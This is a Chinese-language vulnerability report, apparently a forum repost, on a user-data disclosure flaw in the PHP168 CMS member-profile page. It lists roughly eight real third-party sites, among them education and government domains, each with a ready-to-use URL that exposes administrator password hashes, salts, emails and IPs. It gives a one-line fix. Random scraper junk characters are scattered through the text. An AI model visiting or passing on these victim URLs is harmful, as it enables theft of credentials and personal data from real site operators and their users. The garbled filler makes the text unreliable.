|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
3 ^1 Y+ v$ l+ |: o
* ^ L- h# {1 w" j2 e以PHP168官方演示站点为例,查看任意用户信息的页面链接为:
4 g$ K* h- W. C/ d( q u4 b" v/ V+ {
http://php168.cn/com/homepage.php/admin/member-profile5 _2 Z2 S/ z% Q$ }
5 h8 U x7 A' W) c8 G# w/ ~
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
) u/ A# K( }: k* p) y) qhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
$ U; K& }4 G o3 ^7 k. g" v5 Z- z$ [# R, k; }2 ^
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:6 \! d: n% o2 U1 i
" t5 m* s! N7 C7 t8 h8 o8 G0 w
http://www.zjfzol.com.cn/homepage.php/admin/member-profile6 w* ^+ U/ x1 }
( J+ D- b6 x) q- V
http://www.scswl.cn/homepage.php/admin/member-profile
3 s; J5 V8 [2 S. e& e1 j+ l, o; T/ X$ C$ P6 A1 t
http://www.tunet.edu.cn/homepage.php/admin/member-profile- z4 G+ c% w0 P. o
- G2 T7 J4 c, E( |2 ?. O! I, z
http://www.itlead.com.cn/homepage.php/admin/member-profile
3 Q) H: H+ i9 \+ t, I3 r, j
( }4 ]- k+ T. k& fhttp://www.aedp.cn/homepage.php/admin/member-profile) h6 @8 M7 C9 [/ Q8 @
( V! Q' ^/ {; ^! t6 K
http://www.qianlongnews.com/homepage.php/test/member-profile* p% C3 V* w0 q0 H) b: }% v3 y
* v' Q( u) x1 p+ B2 d
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]; j6 a9 H! W# ?
[/table] |